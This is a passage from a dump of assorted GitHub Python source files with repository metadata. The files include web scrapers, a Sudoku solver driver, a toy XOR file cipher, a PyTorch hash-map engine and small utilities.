data_sl.find(\".//*[@id='\" + corr_sl + \"']\"):\r\n new_s_sl += word.text + ' '\r\n\r\n with open('data/' + tgt_en, 'a', encoding='utf-8') as file:\r\n file.write(new_s_en[:-1] + '\\n')\r\n\r\n with open('data/' + tgt_sl, 'a', encoding='utf-8') as file:\r\n file.write(new_s_sl[:-1] + '\\n')\r\n\r\n","repo_name":"VenoGaube/NLP","sub_path":"helper_functions/convert_xml.py","file_name":"convert_xml.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30490090998","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n# for comparing text of 2 places (own logic)\ndef compareString(str1, str2):\n count = 0\n string1 = str1.lower()\n string2 = str2.lower()\n for i in list(string1.split()):\n for j in list(string2.split()):\n if i == j:\n count = count + 1\n return (2 * count) / (len(string1.split()) + len(string2.split()))\n\n\ndef printParagraph(state, inp):\n url1 = \"http://www.transindiatravels.com/\" + state + \"/\" + inp + \"/\" + \"tourist-places-to-visit-in-\" + inp\n url2 = \"http://www.transindiatravels.com/\" + state + \"/\" + \"tourist-places-to-visit-in-\" + state\n if inp == state:\n url3 = url2\n else:\n url3 = url1\n html = requests.get(url3).text\n # soup = BeautifulSoup(driver.page_source, 'lxml')\n soup = BeautifulSoup(html)\n all_links = soup.find('article')\n sp1 = all_links.find_all('h2')\n sp2 = all_links.find_all('p')\n i = 0\n # for i in range(len(sp1)):\n # print(sp1[i].text)\n my_liss = []\n for i in range(len(sp2)):\n # print(sp2[i].text)\n my_liss.append(sp2[i].text)\n # print()\n return my_liss\n\n\ndef main_funct(state, inp):\n temp = \"\"\n for i in inp.split():\n temp += i + \"-\"\n inp = temp[:-1]\n # temporary list and dictionary objects to be used in the program later\n places = []\n # for storing count of occurance of places from different travel web-sites\n count_dict = {}\n # List for removing unnecessary places like airport, hotel etc.\n unnessaryLis = [\"stores\", \"theatre\", \"dhaba\", \"shop\", \"bar\", \",\", \"[\", \"]\", \"airport\",\n \"airline\", \"bed\", \"medical\", \"hospitals\", \"pub\", \"taxi\", \"residency\", \"pvr\",\n \"mcdonald\", \"tea\", \"chaat\", \"chat\", \"donald\", \"kfc\", \"metro\", \"emergency\",\n \"lodge\", \"stay\", \"helpline\", \"g\", \"zealand\", \"korea\", \"nepal\", \"mongolia\",\n \"rwanda\", \"poland\", \"finland\", \"utter\", \"side\", \"[email\", \"deluxe\", \"palace\",\n \"states\", \"united\", \"canada\", \"vietnam\", \"thailand\", \"arabia\", \"malaysia\",\n \"japan\", \"emirates\", \"pakistan\", \"japan\", \"italy\", \"indonesia\", \"greece\",\n \"germany\", \"france\", \"china\", \"brazil\", \"australia\", \"clinic\", \"lanka\",\n \"netherlands\", \"israel\", \"iran\", \"georgia\", \"russia\", \"egypt\", \"belgium\",\n \"argentina\", \"afghanistan\", \"djibouti\", \"czech\", \"terminus\", \"terminal\",\n \"enquiry\", \"chemist\", \"guest\", \"cafe\", \"ambulance\", \"hospital\", \"cab\", \"cabs\",\n \"railways\", \"station\", \"hotel\", \"restaurant\", \"inn\", \"break\", \"police\",\n \"airline\", \"travels\"]\n\n # list of links we want to scrape for getting data with their required parameters.\n url = [[\"https://wikitravel.org/en/\" + inp, \"span\", \"fn org\"],\n [\"https://en.wikivoyage.org/wiki/\" + inp, \"span\", \"fn org listing-name\", 0],\n [\"https://www.holidify.com/places/\" + inp + \"/sightseeing-and-things-to-do.html\", \"h2\",\n \"card-heading\"], [\n \"http://www.transindiatravels.com/\" + state + \"/\" + inp + \"/tourist-places-to-visit-in-\" + inp,\n \"h2\", \"\"]]\n\n # traversing the links and getting url requests and having data according to required format.\n for link in url:\n # getting html object\n html = requests.get(link[0]).text\n soup = BeautifulSoup(html)\n all_links = soup.find_all(link[1], class_=link[2])\n for link1 in all_links:\n required = True\n temp = list((link1.text).split())\n for i in temp:\n if i.lower() in unnessaryLis:\n required = False\n break\n if (required):\n placeName = link1.text\n for i in range(len(placeName)):\n if ((placeName[i] >= 'a' and placeName[i] <= 'z') or (\n placeName[i] >= 'A' and placeName[i] <= 'Z')):\n placeName = placeName[i:]\n break\n places.append(placeName)\n # print(places)\n\n for place in places:\n temp = place\n delKey = ''\n prevCount = 0\n for key in count_dict.keys():\n if compareString(key, place) >= 0.4:\n # If the length of the previous key is greter than the new place name\n # Replace the old key with new one.\n if (len(key) > len(place)):\n delKey = key\n prevCount = count_dict[key]\n else:\n temp = key\n break\n try:\n if delKey == '':\n count_dict[temp] += 1\n else:\n del (count_dict[delKey])\n count_dict[place] = prevCount + 1\n except:\n count_dict[temp] = 0\n # print(count_dict)\n\n sorted_dict = sorted(((value, key) for (key, value) in count_dict.items()), reverse=True)\n j = 1\n lists = []\n for i in sorted_dict:\n xx = \"\"\n if j < 41:\n # print(j,\". \",end=\"\")\n # print(i[1])\n xx += str(j) + \".\" + i[1]\n lists.append(xx)\n else:\n break\n j += 1\n printParagraph(state, inp)\n return lists\n","repo_name":"pujith22/TouristIndia","sub_path":"app/src/main/python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22122595896","text":"from django import template\nfrom django.utils.translation import ungettext\n\nregister = template.Library()\n\n@register.filter\ndef externalservicetoken_count(user):\n count = user.externalservicetoken_set.filter(authorized=True).count()\n return ungettext('%(count)d service', '%(count)d services', count) % {\n 'count': count\n }\n","repo_name":"mollyproject/mollyproject","sub_path":"molly/auth/templatetags/molly_auth.py","file_name":"molly_auth.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"} +{"seq_id":"30925174282","text":"\"\"\"\nThis is a very time consuming method. Do not use it for any purpose other than\ntesting.\n\"\"\"\n\nimport json\nimport encrypt as e\n\nGkey = 'whatever'\n\ndef setKey(Pkey):\n \"\"\"\n Global key is set. Do not use default.\n \"\"\"\n global Gkey\n if type(Pkey) == str:\n for Li in Pkey:\n if Li not in 'abcdefghijklmnopqrstuvwxyz':\n print('Invalid key')\n return 1\n Gkey = Pkey\n print('\\n\\nKey set to: ', Pkey, '\\n\\nDo not forget this key. It will not be displayed again.\\n\\n')\n return 0\n else:\n print('Invalid key')\n return 1\n \ndef getNLines(Pn, Pval):\n \"\"\"\n Reads n lines of ip and returns a list of strings.\n \"\"\"\n temp = []\n for Li in range(Pn):\n temp.append(input(Pval + \", Line \" + str(Li + 1) + \": \"))\n return temp\n\ndef createRecord():\n \"\"\"\n Reads questions, options and other data.\n \"\"\"\n Lrecord = []\n\n for Li in ['Question', 'Option1', 'Option2', 'Option3', 'Option4']:\n Ls = \"\\nEnter the number of lines of \" + Li + \": \"\n while True:\n try:\n Ln = int(input(Ls))\n break\n except:\n print('Please enter a number')\n Lrecord.append(getNLines(Ln, Li))\n\n for Li in ['Correct answer', 'Score']:\n while True:\n try:\n Ln = int(input(\"\\nEnter \" + Li + \": \"))\n if Ln in range(1,5):\n Lrecord.append([str(Ln)])\n else:\n print(\"Please enter a number in range 1-4\")\n continue\n break\n except:\n print('Please enter a number in range 1-4')\n return e.encryptRecord(Lrecord, Gkey)\n\ndef writeToFile(Pfile, Pmode = 'a'):\n \"\"\"\n Write records into Pfile as json data.\n \"\"\"\n Lcount = 0\n fp = open(Pfile, Pmode)\n while True:\n LrecordString = json.dumps(createRecord()) + '\\n'\n temp = fp.write(LrecordString)\n Lcount += 1\n while True:\n Lin = input('Add another record? (Y/N): ')\n if Lin == 'Y' or Lin == 'y' or Lin == 'N' or Lin == 'n':\n break\n if Lin == 'N' or Lin == 'n':\n break\n print(Lcount, \"records created\")\n return 0\n\ndef main():\n \"\"\"\n \n \"\"\"\n while True:\n temp = setKey(input(\"Please enter a valid string to set as key: \"))\n if temp == 0:\n break\n LofName = input(\"Enter the name of the output file: \")\n while True:\n Lmode = input(\"Enter mode (a/w): \")\n if Lmode == 'a' or Lmode == 'w':\n break\n else:\n print('Please enter a valid mode.')\n helper(LofName, Lmode)\n","repo_name":"praroh2/McqTester","sub_path":"generateQfileManually.py","file_name":"generateQfileManually.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36048252453","text":"from spider_template import GGVenturesSpider\n\nclass Gbr0023Spider(GGVenturesSpider):\n name = 'gbr_0023'\n country = 'United Kingdom'\n start_urls = [\"https://www.northumbria.ac.uk/about-us/academic-departments/newcastle-business-school/contact-us/\"]\n # eventbrite_id = 47699605203\n # TRANSLATE = True\n\n # handle_httpstatus_list = [301,302,403,404,429]\n\n static_name = \"Northumbria University,Newcastle Business School\"\n static_logo = \"https://www.northumbria.ac.uk/-/media/40f0efdb3a6745fda5b0d982d53b8cd9.ashx\"\n\n # MAIN EVENTS LIST PAGE\n parse_code_link = \"https://www.northumbria.ac.uk/about-us/news-events/events/\"\n\n university_contact_info_xpath = \"//div[@class='rich-text']\"\n # contact_info_text = True\n contact_info_textContent = True\n # contact_info_multispan = True\n\n def parse_code(self,response):\n try:\n ####################\n self.driver.get(response.url)\n # self.check_website_changed(upcoming_events_xpath=\"//div[@id='content-bottom']//a\",checking_if_none=True)\n # self.ClickMore(click_xpath=\"//div[contains(@class,'cal_load-button')]/button\",run_script=True)\n # self.Mth.WebDriverWait(self.driver, 10).until(self.Mth.EC.frame_to_be_available_and_switch_to_it((self.Mth.By.XPATH,\"//iframe[@title='List Calendar View']\")))\n # for link in self.multi_event_pages(num_of_pages=6,event_links_xpath=\"//h3/a\",next_page_xpath=\"//a[text()='>>']\",get_next_month=True):\n for link in self.events_list(event_links_xpath=\"//article[@class='rich-text']//a\"):\n self.logger.debug(f\"LINK: |{link}|\")\n self.getter.get(link)\n if self.unique_event_checker(url_substring=['northumbria.ac.uk']):\n self.Func.print_log(f\"Currently scraping --> {self.getter.current_url}\",\"info\")\n\n item_data = self.item_data_empty.copy()\n # self.Mth.WebDriverWait(self.driver, 10).until(self.Mth.EC.frame_to_be_available_and_switch_to_it((self.Mth.By.XPATH,\"//iframe[@title='Event Detail']\")))\n\n item_data['event_name'] = self.scrape_xpath(xpath_list=[\"//header[@class='course-heading']\"],method='attr')\n item_data['event_desc'] = self.scrape_xpath(xpath_list=[\"//div[@class='rich-text']\"],method='attr')\n # item_data['event_date'] = self.scrape_xpath(xpath_list=[\"//div[@class='gs-fromTablet6']\",\"//div[@class='rich-text']//h2\"],method='attr')\n # item_data['event_time'] = self.scrape_xpath(xpath_list=[\"//p[@class='time']\"],method='attr')\n\n item_data['event_date'] = self.get_datetime_attributes(\"//div[@class='calendar']//time\",'datetime')\n item_data['event_time'] = self.get_datetime_attributes(\"//p[@class='time']/time\",'datetime')\n\n # item_data['startups_contact_info'] = self.scrape_xpath(xpath_list=[\"//dt[text()='Contact']/..\"],method='attr',error_when_none=False)\n # item_data['startups_link'] = ''\n # item_data['startups_name'] = ''\n item_data['event_link'] = link\n\n yield self.load_item(item_data=item_data,item_selector=link)\n\n ####################\n except Exception as e:\n self.exception_handler(e)","repo_name":"kingcobra1325/ggventures-bot","sub_path":"ggventures/spiders/gbr_0023.py","file_name":"gbr_0023.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9880454250","text":"# program to approximate the value of pi\r\n# Auther: Nangamso Mgoqi\r\n# Date: 14 March 2014 \r\n \r\nimport math\r\nx = 2\r\ny = math.sqrt(2)\r\nz = 0\r\nwhile z!=1:\r\n \r\n z= 2/y\r\n \r\n x = x*z\r\n y = math.sqrt(2+y)\r\n \r\nprint(\"Approximation of pi:\", round(x,3))\r\nr = eval(input(\"Enter the radius:\\n\"))\r\nArea = x*r**2\r\nprint(\"Area:\", round(Area,3))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/mgqnan002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6993718409","text":"# 2020-06-19\n# Шифр Виженера\nimport argparse\nimport os.path\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"srcfile\", metavar=\"src\", type=str, help=\"source filename\")\nparser.add_argument(\"dstfile\", metavar=\"dst\", type=str, help=\"destination filename\")\nparser.add_argument(\"--pwd\", metavar=\"password\", type=str, help=\"password\", required=True)\nparser.add_argument(\"--force\", default=False, action=\"store_true\", help=\"please mention to have existing file overwritten\")\nargs = parser.parse_args()\npwd = args.pwd\n\nbufsize = 1024\n\nif os.path.exists(args.srcfile):\n src = open(args.srcfile, \"rb\")\nelse:\n print(\"srcfile not found\")\n exit()\n\nif args.force or not os.path.exists(args.dstfile):\n dst = open(args.dstfile, \"wb\")\nelse:\n print(\"dstfile already exists. Use \\\"--force\\\" to overwrite it\")\n exit()\n\npos = 0\nwhile True:\n block = src.read(bufsize)\n if not block:\n break\n block2 = [ord('-')]*len(block)\n i = 0\n for b in block:\n pwd_char = pwd[pos % len(pwd)]\n dst_char = b ^ ord(pwd_char)\n # block2.append(dst_char)\n block2[i] = dst_char\n i += 1\n pos += 1\n\n dst.write(bytes(block2))\n\nsrc.close()\ndst.close()\n","repo_name":"boriksim/summer2020-tasks","sub_path":"task019-Vigenere-cipher/Vigenere-cipher.py","file_name":"Vigenere-cipher.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17544756578","text":"#!/usr/bin/python3\n\"\"\" Base Class Module \"\"\"\nimport json\n\n\nclass Base:\n \"\"\" Base Class \"\"\"\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\" init function \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Json list_dictories \"\"\"\n if list_dictionaries is None:\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n","repo_name":"Kenfernandezjr/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18457045958","text":"from typing import Union, Tuple, Dict, OrderedDict, Optional\n\nfrom collections import OrderedDict\nimport warnings\n\nimport torch\nimport torch.nn as nn\n\nfrom .common import _get_c_extension\n\nbackend = _get_c_extension()\n\n\n\"\"\"\nThe core differences between collision-free (ASH) and collision-allowed (NGP) hash map are:\n1. Collision-free requires spatial initialization, while collision-allowed does not.\n2. A query could fail in collision-free, while it will always succeed in collision-allowed.\n\nIn other words, forward function for collision-free modules will always return a result with a mask.\nThis is acceptable (and even desirable) for classical operations:\n- Marching Cubes\n- TSDF fusion\n- Sampling\n\nThis is problematic for (differentiable) neural operations:\n- Encoding\nOne work around would be using an padding_index=capacity and return encoding at this exact index\n feat_fg, mask_fg = ash_module.forward(x)\n\nAnother work around for this could be an additional low-resolution dense\n\"empty space grid\" equipped with contraction, which guarantees a valid result.\nThe interface would be similar to:\n feat_fg, mask_fg = ash_module.forward(x)\n feat_bg = empty_space_module.forward(x)\n feat = feat_fg * mask_fg + feat_bg * (1 - mask_fg)\n\"\"\"\n\n\nclass ASHEngine(nn.Module):\n \"\"\"\n The core ASH engine. It maintains the minimal states of a hash map,\n namely a keys-indices map, associated with a heap.\n \"\"\"\n\n def __init__(\n self,\n dim: int,\n capacity: int,\n device: Union[str, torch.device] = torch.device(\"cpu\"),\n ):\n \"\"\"Init ASH engine.\n Args:\n dim: dimension of the keys\n capacity: maximum number of items in the hash map\n device: device to store the states\n \"\"\"\n super().__init__()\n assert dim > 0, \"dim must be positive\"\n self.dim = dim\n\n assert capacity > 0, \"capacity must be positive\"\n self.capacity = capacity\n\n self.device = isinstance(device, str) and torch.device(device) or device\n\n self._register_buffers()\n self.backend = backend.HashMap(self.dim, self.capacity, self._heap, self.device)\n\n def _register_buffers(self) -> None:\n \"\"\"Register buffers for state_dict save and load.\"\"\"\n\n self.register_buffer(\n \"_heap\", torch.arange(self.capacity, dtype=torch.int32, device=self.device)\n )\n\n # DO NOT ACCESS: keys and indices are reserved for state_dict save and load.\n self.register_buffer(\n \"_keys\",\n torch.zeros(\n (self.capacity, self.dim), dtype=torch.int32, device=self.device\n ),\n )\n self.register_buffer(\n \"_indices\",\n torch.zeros(self.capacity, dtype=torch.long, device=self.device),\n )\n self.register_buffer(\n \"_size\", torch.zeros(1, dtype=torch.int32, device=self.device)\n )\n self.register_load_state_dict_post_hook(self._post_load_state_dict_hook)\n\n def state_dict(\n self, destination=None, prefix: str = \"\", keep_vars: bool = False\n ) -> \"OrderedDict[str, torch.Tensor]\":\n \"\"\"Override state_dict to obtain active keys and indices into the backend.\n Args:\n destination: see torch.nn.Module.state_dict\n prefix: see torch.nn.Module.state_dict\n keep_vars: see torch.nn.Module.state_dict\n Returns:\n state_dict: state_dict with size, heap, active keys, and indices\n to reproduce the hash map.\n \"\"\"\n state_dict = super().state_dict(destination, prefix, keep_vars)\n\n active_keys, active_indices = self.items()\n size = self.backend.size()\n\n self._size[:] = size\n if size > 0:\n self._keys[:size] = active_keys\n self._indices[:size] = active_indices\n\n return state_dict\n\n def _post_load_state_dict_hook(self, module, incompatible_keys) -> None:\n \"\"\"hook to load active keys and indices into the backend.\n Args:\n module: see torch.nn.Module.state_dict\n incompatible_keys: see torch.nn.Module.state_dict\n \"\"\"\n backend_state_keys = [\"_keys\", \"_indices\", \"_size\"]\n\n size = self._size.item()\n\n backend_state_dict = {\n \"active_keys\": self._keys[:size],\n \"active_indices\": self._indices[:size],\n \"heap\": self._heap,\n }\n\n assert len(self._heap) == self.capacity\n self._key_check(backend_state_dict[\"active_keys\"])\n\n self.backend.load_states(backend_state_dict)\n\n def _key_check(self, keys: torch.Tensor) -> None:\n \"\"\"Check keys shape and dtype.\n Args:\n keys: keys to check for insert, find, erase\n \"\"\"\n assert len(keys.shape) == 2 and keys.shape[1] == self.dim, \"keys shape mismatch\"\n\n if keys.dtype != torch.int32:\n warnings.warn(\"keys are not int32, conversion might reduce precision.\")\n\n def _value_check(\n self, values: Dict[str, torch.Tensor], external_values: Dict[str, torch.Tensor]\n ) -> None:\n \"\"\"Check values shape and dtype.\n Check if insertions and external_values are consistent.\n Args:\n values: values to check for insert\n external_values: external values, usually maintained by the user as the values or embeddings\n \"\"\"\n assert values.keys() == external_values.keys()\n for k, v in values.items():\n assert k in external_values\n\n assert v.is_contiguous()\n assert external_values[k].is_contiguous()\n\n assert v.ndim == external_values[k].ndim\n assert v.dtype == external_values[k].dtype\n assert v.shape[1:] == external_values[k].shape[1:]\n assert self.capacity == external_values[k].shape[0]\n\n def find(self, keys: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Find indices of keys in the hash map.\n Args:\n keys: (N, dim)\n Returns:\n indices: (N,) indices of found keys in the hash map, can be associated with maintained values\n masks: (N,) masks of whether keys are in the hash map\n \"\"\"\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return (\n torch.empty((0,), dtype=torch.long, device=self.device),\n torch.empty((0,), dtype=torch.bool, device=self.device),\n )\n\n keys = keys.to(self.device, torch.int32).contiguous()\n indices, masks = self.backend.find(keys)\n return indices, masks\n\n def insert_keys(self, keys: torch.Tensor) -> None:\n \"\"\"Insert keys into the hash map without specifying values.\n Args:\n keys: (N, dim)\n \"\"\"\n # TODO(wei): add safe and unsafe options\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n keys = keys.to(self.device, torch.int32).contiguous()\n\n prev_size = self.size()\n self.backend.insert_keys(keys)\n curr_size = self.size()\n if len(keys) + prev_size > self.capacity and curr_size > self.capacity:\n warnings.warn(\n f\"Insertion of {len(keys)} increased the hash map size from {prev_size} \"\n f\"to {curr_size}, which exceeds the hash map capacity {self.capacity}. \"\n \"Please resize the hash map or the behavior could be unexpected.\"\n )\n\n def insert(\n self,\n keys: torch.Tensor,\n values: Dict[str, torch.Tensor],\n external_values: Dict[str, torch.Tensor],\n ) -> None:\n \"\"\"Insert keys and values into the hash map.\n Args:\n keys: (N, dim)\n values: dict of values to insert, e.g. {\"value\": (N, dim)}\n external_values: dict of external values, usually maintained by the user as the values or embeddings\n \"\"\"\n self._key_check(keys)\n\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n self._value_check(values, external_values)\n for k, v in values.items():\n assert v.shape[0] == len(keys)\n keys = keys.to(self.device, torch.int32).contiguous()\n\n prev_size = self.size()\n self.backend.insert(keys, values, external_values)\n curr_size = self.size()\n if len(keys) + prev_size > self.capacity and curr_size > self.capacity:\n warnings.warn(\n f\"Insertion of {len(keys)} increased the hash map size from {prev_size} \"\n f\"to {curr_size}, which exceeds the hash map capacity {self.capacity}. \"\n \"Please resize the hash map or the behavior could be unexpected.\"\n )\n\n def erase(self, keys: torch.Tensor) -> None:\n \"\"\"Erase keys from the hash map.\n Args:\n keys: (N, dim)\n \"\"\"\n self._key_check(keys)\n if len(keys) == 0:\n warnings.warn(\"empty keys\")\n return\n\n self.backend.erase(keys)\n\n def clear(self) -> None:\n \"\"\"Clear the hash map.\"\"\"\n self.backend.clear()\n\n def size(self) -> int:\n \"\"\"Return the current size of the hash map.\"\"\"\n return self.backend.size()\n\n def resize(\n self,\n capacity: int,\n old_external_values: Dict[str, torch.Tensor] = None,\n new_external_values: Dict[str, torch.Tensor] = None,\n ) -> None:\n \"\"\"Resize the hash map to a new capacity.\n Args:\n capacity: new capacity\n old_external_values: dict of external values or embeddings before resizing\n new_external_values: dict of external values or embeddings after resizing\n \"\"\"\n assert capacity >= self.size(), \"new capacity is smaller than the current size\"\n assert capacity > 0, \"new capacity is 0\"\n\n active_keys, old_indices = self.items()\n size = self.backend.size()\n del self.backend\n\n self.capacity = capacity\n\n self._register_buffers()\n self.backend = backend.HashMap(self.dim, self.capacity, self._heap, self.device)\n\n if size == 0:\n return\n\n if old_external_values is not None and new_external_values is not None:\n active_old_external_values = {}\n for k, v in old_external_values.items():\n active_old_external_values[k] = v[old_indices]\n\n self.backend.insert(\n active_keys, active_old_external_values, new_external_values\n )\n else:\n self.backend.insert_keys(active_keys)\n\n def keys(self) -> torch.Tensor:\n \"\"\"Return all active keys in the hash map.\"\"\"\n active_keys, active_indices = self.items()\n return active_keys\n\n def items(self) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Return all active keys and indices to external values in the hash map.\n Returns:\n active_keys: (N, dim)\n active_indices: (N,)\n \"\"\"\n size = self.backend.size()\n if size == 0:\n return (\n torch.empty((0, self.dim), dtype=torch.int32, device=self.device),\n torch.empty((0,), dtype=torch.long, device=self.device),\n )\n active_keys, active_indices = self.backend.items()\n return active_keys, active_indices\n\n # TODO(wei): implement cpu engine and enable to and from\n def to(self, device: Union[str, torch.device]):\n device = torch.device(device) if isinstance(device, str) else device\n new_engine = ASHEngine(self.dim, self.capacity, device)\n\n return new_engine\n\n def cpu(self):\n return self.to(\"cpu\")\n\n def cuda(self, device: Optional[Union[str, torch.device]] = None):\n if device is None:\n return self.to(\"cuda\")\n return self.to(device)\n\n def __repr__(self) -> str:\n name = \"ASHEngine (dim={}, capacity={}, size={}) at {}\".format(\n self.dim,\n self.capacity,\n self.size(),\n self.device,\n )\n return name\n\n\nclass ASHModule(nn.Module):\n \"\"\"\n Helper virtual class to handle engine's 'to' operations\n Inherited by HashEmbedding, HashMap, and HashSet\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.engine = None\n\n def to(self, device):\n assert self.engine is not None, \"engine is not initialized\"\n module = super(ASHModule, self).to(device)\n module.engine = module.engine.to(device)\n return module\n\n def cpu(self):\n return self.to(torch.device(\"cpu\"))\n\n def cuda(self, device: Optional[Union[str, torch.device]] = None):\n if device is None:\n return self.to(torch.device(\"cuda\"))\n return self.to(device)\n","repo_name":"theNded/torch-ash","sub_path":"ash/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12835,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"40"} +{"seq_id":"26470502068","text":"#! /usr/bin/env python\n# -*-- coding: utf-8 -*-\n\nimport copy\nimport json\nimport os\nimport subprocess\n\nfrom ti_server.common.log import logger as log\nfrom ti_server.common.path_constant import PathConstant\n\n\nclass BaseFun(object):\n\n @staticmethod\n def __pre_func():\n os.umask(0)\n\n @staticmethod\n def exe_cmd(cmd, pid=False):\n pro = subprocess.Popen(\n args=cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=PathConstant.SUBPROCESS_ROOT,\n preexec_fn=BaseFun.__pre_func, close_fds=True\n )\n output = pro.communicate()\n code = pro.returncode\n if not pid:\n return code, output\n return pro.pid, code, output\n\n @staticmethod\n def exe_cmd_demon(cmd):\n subprocess.Popen(\n args=cmd, shell=True\n )\n\n @staticmethod\n def com_read_file_with_json(file_name, mode=\"r\", **kwargs):\n if not os.path.exists(file_name):\n log.warning('File <%s> not exist.' % file_name)\n if \"default\" in kwargs:\n return kwargs[\"default\"]\n raise IOError(\"No such file or directory: %s\" % file_name)\n\n with open(file_name, mode) as fp:\n json_body = json.load(fp)\n return json_body\n\n @staticmethod\n def com_write_file_with_json(file_name, json_body, mode=\"w+\"):\n body = copy.deepcopy(json_body)\n with open(file_name, mode) as fp:\n fp.write(json.dumps(body))\n log.info('Save file <%s> success.' % file_name)\n","repo_name":"qwasxj/ti_server","sub_path":"ti_server/common/ti_base_func.py","file_name":"ti_base_func.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20387325399","text":"from Sudoku import Sudoku\nfrom grids import grids\nfrom flag_identifier import input_collection\nfrom file_input import file_input_main\nimport sys\nimport numpy as np\nfrom profile_docs import profile_grids\n\ndef main():\n\n # Check if the input is valid - only contains valid flags and arguments\n try:\n flag_dict, flag_value = input_collection(sys.argv[1:])\n\n # If not, print the error and exit\n except ValueError as e:\n print(\"Error: \",e)\n sys.exit()\n\n # If the file flag is enabled, run the file input function and exit\n if flag_dict['-file'] == True:\n # Run seperate file input function and exit\n file_input_main(flag_value['-file'][0], flag_value['-file'][1], flag_dict['-hint'], flag_value['-hint'],flag_dict['-explain'], flag_dict['-profile'])\n return \n \n ##### IF THERE IS NO FILE INPUT #####\n # The grids from grids.py are run automatically\n\n # Initialise the grid storage dictionary to store the Sudoku class instances\n grid_storage = {}\n # Initialise the solve metrics dictionary to store the profiling metrics if profiling is enabled\n if flag_dict['-profile'] == True:\n solve_metrics = {}\n\n # Iterate through the grids and initialise the Sudoku class for each grid, storing the instance in the grid storage dictionary\n for index, grid in enumerate(grids):\n idx = int(index) + 1\n grid_storage[ f'Grid {idx}'] = Sudoku(grid = grid[0], \n n_rows = grid[1], \n n_cols = grid[2], \n hint_flag = flag_dict['-hint'], \n hint_number = flag_value['-hint'], \n profile_flag= flag_dict['-profile'],\n explain_flag= flag_dict['-explain'])\n \n\n # Iterate through the grid storage dictionary and solve each grid using the wavefront and recursion methods\n for instance in grid_storage:\n\n # Solve the grid\n grid_storage[instance].wavefront_solve()\n grid_storage[instance].recursion_solve()\n output_grid = grid_storage[instance].grid\n\n\n # If the hint flag is enabled, generate the hint grid and return it\n if flag_dict['-hint'] == True:\n grid_storage[instance].hint_class()\n # output grid (grid to be printed) is reasigned to the hint grid\n output_grid = grid_storage[instance].hint_grid\n # This is just a little printed message outside of the explain method so\n # There is a little explanation of what the hint grid is\n if flag_dict['-explain'] == False:\n print('Hint Grid')\n print(f'({flag_value[\"-hint\"]} hints requested)')\n \n # Print the appropriate grid\n print(instance)\n print(np.array(output_grid))\n\n\n\n # If the profile flag is enabled, run the profiling method, storing the metrics in the solve metrics dictionary\n if flag_dict['-profile'] == True:\n print('\\nRunning profiling simulations...\\n')\n grid_storage[instance].profile()\n\n solve_metrics[instance] = [(grid_storage[instance].n_rows, grid_storage[instance].n_cols), \n (grid_storage[instance].avg_time_recursion, grid_storage[instance].avg_time_wavefront, grid_storage[instance].avg_time_overall), \n grid_storage[instance].zero_counter]\n \n # If the explain flag is enabled, print the explanation of the solution (either hints or full solution)\n if flag_dict['-explain'] == True:\n grid_storage[instance].explain_class()\n \n # If the profile flag is enabled, print the profiling metrics (plots)\n if flag_dict['-profile'] == True:\n profile_grids(solve_metrics) \n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"pilipb/further-cp-cw3-g32","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"445413903","text":"\n# coding: utf-8\n#Omar Isaias Flores Galicia\n#18.01.2018\n\n\n#Main Libs\nimport os\nimport sys\nimport traceback\nimport pandas as pd\nimport json\nimport requests\nfrom requests import exceptions\nfrom datetime import datetime, timedelta\n\n\n#CONSTANT VARIABLES\nAPI_URL_BASE = 'https://www.alphavantage.co/query'\nFUNCTION_TOKEN = 'DIGITAL_CURRENCY_DAILY'\nSYMBOL_TOKEN = 'BTC'\nMARKET_TOKEN = 'USD'\nASC_ORDER = True\nDESC_ORDER = False\nERROR_TAG_JSON_PROP = 'Error Message'\nPATH_TO_STORE = 'temp_records'\nheaders = {'Content-Type': 'application/json'}\nFILE_DATA_COLUMNS = [\"timestamp\",\n \"1a. open (USD)\",\n \"1b. open (USD)\",\n 